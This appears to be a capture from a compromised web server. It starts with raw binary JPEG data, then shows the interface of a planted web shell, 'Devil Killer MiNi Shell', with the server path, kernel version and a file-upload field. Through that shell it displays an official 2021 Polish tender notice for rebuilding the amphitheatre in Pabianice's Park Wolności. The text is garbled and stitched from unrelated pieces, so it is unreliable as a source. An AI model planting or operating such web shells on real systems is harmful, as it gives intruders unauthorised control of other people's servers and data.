JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210602/0007241501-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00072415 z dnia 2021-06-02</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa amfiteatru w Parku Wolności– II postępowanie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Pabianice reprezentowana przez Prezydenta Miasta Pabianic Grzegorza Mackiewicza</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 472057715</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zamkowa 16</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pabianice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">95-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL712 - Łódzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">poczta@um.pabianice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.um.pabianice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa amfiteatru w Parku Wolności– II postępowanie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-07a0e22c-bec9-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00072415</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000829/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Przebudowa amfiteatru w Parku Wolności– II postępowanie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.bip.um.pabianice.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.bip.um.pabianice.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W<br/>postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu<br/>miniPortalu (dostępny jest pod adresem: https://miniportal.uzp.gov.pl), ePUAPu (dostępny pod<br/>adresem:https://epuap.gov.pl/wps/portal), poczty elektronicznej. Zamawiający wyznacza do kontaktu z<br/>Wykonawcami - w kwestiach formalnych Edyta Fila-Wyleżych- kierownik Referatu Zamówień<br/>Publicznych e-mail: zamowienia.publiczne@um.pabianice.pl, w kwestiach merytorycznych Agnieszka<br/>Pietrowska- naczelnik Wydziału Ochrony Środowiska e-mail: apietrow@um.pabianice.pl. Wykonawca<br/>zamierzający wziąć udział w postępowaniu musi posiadać konto na ePUAP i wtedy ma dostęp do<br/>„Formularza do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane są w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP). Zasady składania ofert oraz<br/>dokumentów składanych wraz z ofertą oraz wymagania techniczne i organizacyjne ich wysyłania<br/>opisane są w Instrukcji użytkownika. W celu korzystania z systemu miniPortal konieczne jest<br/>dysponowanie przez użytkownika urządzeniem teleinformatycznym z dostępem do sieci Internet.<br/>Szczegóły w SWZ w rozdziale 11 w szczególności pkt 11.4- 11-6. Link do postępowania i jego ID są w<br/>załączniku nr 9 do SWZ. Dane postępowanie też na Liście wszystkich postępowań w miniPortalu,<br/>klikając opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.<br/>Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego<br/>na ePUAP i udostępnionego również na miniPortalu.Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach danego postępowania. W<br/>formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będzie korespondencja związana z postępowaniem. Ofertę w języku polskim składa się, pod rygorem<br/>nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Sposób złożenia oferty, w tym zaszyfrowania oferty opisany jest w „Instrukcji<br/>użytkownika”, dostępnej na stronie:https://miniportal.uzp.gov.pl<br/>Z uwagi na ograniczoną liczbę znaków w tym ogłoszeniu więcej informacji w dalszej części ogłoszenia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1) Jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca przekazał w niniejszym postępowaniu;<br/>2) dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na Postępowanie o udzielenie<br/>zamówienia<br/>publicznego pt: Przebudowa amfiteatru w Parku Wolności- II postępowanie, prowadzonym w trybie<br/>podstawowym;<br/>3) odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. –<br/>Prawo zamówień publicznych(Dz. U. z 2019 r. poz. 2019 z późn. zm.),dalej „ustawa Pzp”;<br/>4) dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 97 ust. 1<br/>ustawy Pzp,przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>5)obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>6) w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>7) Wykonawca posiada:− na podstawie art. 15 RODO prawo dostępu do danych osobowych<br/>dotyczących Wykonawcy;− na podstawie art. 16 RODO prawo<br/>do sprostowania danych osobowych, o ile ich zmiana nie skutkuje zmianą wyniku postępowania o<br/>udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą<br/>Pzp oraz nie narusza integralności protokołu oraz jego załączników;− na podstawie art. 18 RODO<br/>prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;− prawo do wniesienia skargi do Prezesa Urzędu<br/>Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego danych osobowych<br/>narusza przepisy RODO;<br/>8) Wykonawcy nie przysługuje:− w związku z art. 17 ust. 3 lit. b, d lub e<br/>RODO prawo do usunięcia danych osobowych;− prawo do przenoszenia danych osobowych, o którym<br/>mowa w art. 20 RODO;− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c<br/>RODO.Szczegółowe informacje dostępne są w Rozdziale 22 swz.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W przypadku, gdy wykonanie obowiązków, o których<br/>mowaw art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku,Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji<br/>mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu.Skorzystanie przez osobę, której dane dotyczą, z<br/>uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16<br/>rozporządzenia2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym z<br/>ustawą.Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie<br/>zamówienia publicznego lub konkursu. W przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie Zamówień Publicznych, prawa, o których mowa w art. 15 i art. 16<br/>rozporządzenia 2016/679, są wykonywane w drodze żądania skierowanego do Zamawiającego.<br/>Szczegółowe informacje w rozdziale 22 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.5.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1.Przedmiotem zamówienia jest: Przebudowa amfiteatru w Parku Wolności<br/>4.2.Przedmiot zamówienia obejmuje:Przebudowę budowli użyteczności publicznej – amfiteatru o<br/>łącznej powierzchni zabudowy 1902,8 m2 w Parku Wolności przy ul. Łaskiej 114 w Pabianicach,<br/>w tym: 1) budowę widowni oraz przebudowę sceny, 2)wykonanie placu utwardzonego z kostki<br/>brukowej, 3)wykonanie trawników, 4)poszerzenie drogi dojazdowej do sceny, 5)przebudowę<br/>instalacji energetycznej ze zmianą lokalizacji lamp oświetleniowych, 6)lokalizację skrzynki<br/>elektroenergetycznej, 7)zakup i montaż plastikowych siedzisk na widowni, 8)montaż elementów<br/>małej architektury (kamiene kule, balustrady, kosze na odpady).<br/>4.3.Nazwa/y i kod/y Wspólnego Słownika Zamówień: (CPV):<br/>45233000, 45112000, 45111000, 45111000, 45233222, 45233320-8, 45233000, 45233320,<br/>45000000-7, 45262311-4, 45421000-4, 45311100-1.<br/>4.4.Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku Nr 1 do SWZ. Składają<br/>się na niego następujące dokumenty: 1) projekt architektoniczno-budowlany przebudowy<br/>amfiteatru, w tym: a) część architektoniczna b) część elektryczna c) część konstrukcyjna; 2)<br/>projekt wykonawczy przebudowy amfiteatru 3) specyfikacje techniczne wykonania i odbioru<br/>robót budowlanych 4) przedmiar robót Uwaga: Zakres zamówienia nie obejmuje opisanych w<br/>dokumentacji robót związanych z rozbiórką widowni oraz usunięciem drzew I krzewów (zakres<br/>ten został wcześniej wykonany przez Zamawiającego).<br/>4.5.Zamawiający wymaga aby w dniach od 27 do 30 sierpnia 2021 Wykonawca nie wykonywał<br/>żadnych robot związaną z realizacją niniejszego zamówienia w związku organizacją w tym<br/>czasie imprezy sportowej na terenie Parku.<br/>4.6.Szczególne wymagania i wytyczne dla Wykonawcy. Teren robót jest parkiem miejskim,<br/>dlatego też Wykonawca zobowiązany jest zachować pełną staranność przy wygrodzeniu terenu<br/>robót oraz wykonywaniu robót w celu zachowania warunków pełnego bezpieczeństwa dla osób<br/>postronych poruszających się po parku oraz zachowania dbałości o otoczenie terenu<br/>prowadzonych robót.<br/>4.7.Rozwiązania równoważne. W każdym przypadku użycia w opisie przedmiotu zamówienia<br/>norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o<br/>których mowa w art. 101 ust. 1 pkt 2 oraz ust. 3 ustawy Pzp Wykonawca powinien przyjąć, że<br/>odniesieniu takiemu towarzyszą wyrazy „lub równoważne”. W przypadku użycia w dokumentacji<br/>projektowej odniesień do norm, europejskich ocen technicznych, aprobat, specyfikacji<br/>technicznych i systemów referencji technicznych Zamawiający dopuszcza rozwiązania<br/>równoważne opisywanym. Wykonawca analizując dokumentację projektową powinien założyć,<br/>że każdemu odniesieniu użytemu w dokumentacji projektowej towarzyszy wyraz „lub<br/>równoważne". W przypadku, gdy w dokumentacji projektowej lub specyfikacji technicznej<br/>wykonania i odbioru robót zostały użyte znaki towarowe, oznacza to, że są podane przykładowo<br/>i określają jedynie minimalne oczekiwane parametry jakościowe oraz wymagany standard.<br/>Wykonawca może zastosować materiały lub urządzenia równoważne, lecz o parametrach technicznych i jakościowych podobnych lub lepszych, których zastosowanie w żaden sposób nie<br/>wpłynie negatywnie na prawidłowe funkcjonowanie rozwiązań przyjętych w dokumentacji<br/>projektowej. Wykonawca, który zastosuje urządzenia lub materiały równoważne będzie<br/>obowiązany wykazać w trakcie realizacji zamówienia, że zastosowane przez niego urządzenia i<br/>materiały spełniają wymagania określone przez Zamawiającego. Użycie w dokumentacji<br/>projektowej etykiety oznacza, że Zamawiający akceptuje wszystkie etykiety potwierdzające, że<br/>dane roboty budowlane, dostawy lub usługi spełniają równoważne wymagania określonej przez<br/>zamawiającego etykiety. W przypadku gdy wykonawca z przyczyn od niego niezależnych nie<br/>może uzyskać określonej przez zamawiającego etykiety lub równoważnej etykiety, zamawiający,<br/>w terminie, przez siebie wyznaczonym akceptuje inne odpowiednie przedmiotowe środki<br/>dowodowe, w szczególności dokumentację techniczną producenta, o ile dany wykonawca<br/>udowodni, że roboty budowlane, dostawy lub usługi, które mają zostać przez niego wykonane,<br/>spełniają wymagania określonej etykiety lub określone wymagania wskazane przez<br/>Zamawiającego. Użycie w dokumentacji projektowej wymogu posiadania certyfikatu wydanego<br/>przez jednostkę oceniającą zgodność lub sprawozdania z badań przeprowadzonych przez tę<br/>jednostkę jako środka dowodowego potwierdzającego zgodność z wymaganiami lub cechami<br/>określonymi w opisie przedmiotu zamówienia, kryteriach oceny ofert lub warunkach realizacji<br/>zamówienia oznacza, że zamawiający akceptuje również certyfikaty wydane przez inne<br/>równoważne jednostki oceniające zgodność. Zamawiający akceptuje także inne odpowiednie<br/>środki dowodowe, w szczególności dokumentację techniczną producenta, w przypadku, gdy<br/>dany Wykonawca nie ma ani dostępu do certyfikatów lub sprawozdań z badań, ani możliwości<br/>ich uzyskania w odpowiednim terminie, o ile ten brak dostępu nie może być przypisany danemu<br/>Wykonawcy, oraz pod warunkiem że dany Wykonawca udowodni, że wykonywane przez niego<br/>roboty budowlane, dostawy lub usługi spełniają wymogi lub kryteria określone w opisie<br/>przedmiotu zamówienia, kryteriach oceny ofert lub wymagania związane z realizacją<br/>zamówienia. Jeżeli w opisie przedmiotu zamówienia ujęto zapis wynikający z KNR lub KNNR<br/>wskazujący na konieczność wykorzystywania przy realizacji zamówienia konkretnego sprzętu o<br/>konkretnych parametrach Zamawiający dopuszcza używanie innego sprzętu o ile zapewni to<br/>osiągnięcie zakładanych parametrów projektowych i nie spowoduje ryzyka niezgodności<br/>wykonanych prac z dokumentacją techniczną.<br/>4.8.Wymagania dotyczące dostępności. Przebudowę amfiteatru wraz z towarzyszącą<br/>infrastrukturą, tj. przebudową sceny widowiskowej, widowni, placu utwardzonego przed sceną,<br/>cięgów komunikacyjnych oraz niezbędnych urządzeń budowlanych, służących do organizowania<br/>imprez artystycznych, rozrywkowych, okolicznościowych, możliwych do zorganizowania na<br/>wolnym powietrzu, zaprojektowano z dostosowaniem dla osób niepełnosprawnych. Wejście na<br/>scenę osobom niepełnosprawnym zapewniono dzięki pochylni, na widowni przewidziano<br/>miejsca na poziomie “0” dla osób niepełnosprawnych.<br/>4.9.Gwarancja.Długość okresu gwarancji na roboty budowlane oraz zamontowane materiały i<br/>urządzenia - stanowi kryterium oceny ofert. Zamawiający określa go na okres w przedziale od 36<br/>miesięcy (termin minimalny) do 60 miesięcy (termin maksymalny). Zamawiającemu przysługują<br/>pełne uprawnienia z tytułu rękojmi za wady fizyczne wynikające z przepisów kodeksu cywilnego<br/>w terminach tam określonych – niezależnie od uprawnień z tytułu gwarancji.<br/>4.10.Ubezpieczenie. Zamawiający wymaga, aby Wykonawca posiadał ubezpieczenie<br/>odpowiedzialności cywilnej ważne przez cały okres realizacji robót w ramach niniejszego<br/>zamówienia w wysokości nie mniejszej niż: 1 500 000 zł (słownie: jeden milion pięćset złotych).<br/>4.11.Przedmiotowe środki dowodowe. Zamawiający nie wymaga w niniejszym postępowaniu<br/>przedmiotowych środków dowodowych.<br/>4.12.Zamawiający nie dokonuje podziału zamówienia na części z następujących<br/>względów:1)Przedmiotem zamówienia jest wykonanie robót funkcjonalnie ze sobą związanych.<br/>Rozdzielenie robót groziłoby niedającymi się wyeliminować problemami organizacyjnymi<br/>związanymi z odpowiedzialnością za poszczególne elementy robót wykonywanych przez<br/>różnych wykonawców. 2)Przy tego typu robotach (równoległe wykonywanie prac z różnych<br/>branż) nie ma możliwości jednoznacznego określenia zasad odpowiedzialności za jeden plac<br/>budowy (przekazany byłby równolegle wielu wykonawcom). Nie jest także możliwe rozgraniczenie odpowiedzialności wielu kierowników budowy. 3)Przy tego typu robotach<br/>wykonywanych przez różnych wykonawców opóźnienie jednego z wykonawców wpłynęłoby<br/>negatywnie na terminowość wykonania innych elementów inwestycji – zależnych od<br/>terminowego wykonania prac przez innego Wykonawcę. Reasumując, Zamawiający nie dokonał<br/>podziału zamówienia na części ze względu na to, że podział taki groziłby nadmiernymi<br/>trudnościami technicznymi oraz nadmiernymi kosztami wykonania zamówienia. Potrzeba<br/>skoordynowania działań różnych wykonawców realizujących poszczególne części zamówienia<br/>mogłaby poważnie zagrozić właściwemu wykonaniu zamówienia. Niedokonanie podziału<br/>zamówienia podyktowane było zatem względami technicznymi, organizacyjnym oraz charakterem przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45233320-8 - Fundamentowanie dróg</p> <p class="mb-0">45262311-4 - Betonowanie konstrukcji</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">370 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokonuje badania oświadczeń stanowiących wstępne<br/>potwierdzenie, że na dzień składania ofert Wykonawca nie podlega wykluczeniu i spełnia warunki<br/>udziału w postępowaniu. Następnie Zamawiający dokonuje oceny ofert, a następnie zbada, czy<br/>Wykonawca, którego oferta została oceniona jako najkorzystniejsza, nie podlega wykluczeniu oraz<br/>spełnia warunki udziału w postępowaniu. W takim przypadku, w terminie nie krótszym niż 5 dni wezwie<br/>Wykonawcę, który przedstawił najkorzystniejszą ofertę do złożenia dokumentów<br/>potwierdzających spełnianie warunków udziału oraz niepodleganie wykluczeniu z postępowania.<br/>Art.274 ustawy pzp stosuje się.<br/>2. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących<br/>treści złożonych ofert.<br/>3. Zamawiający 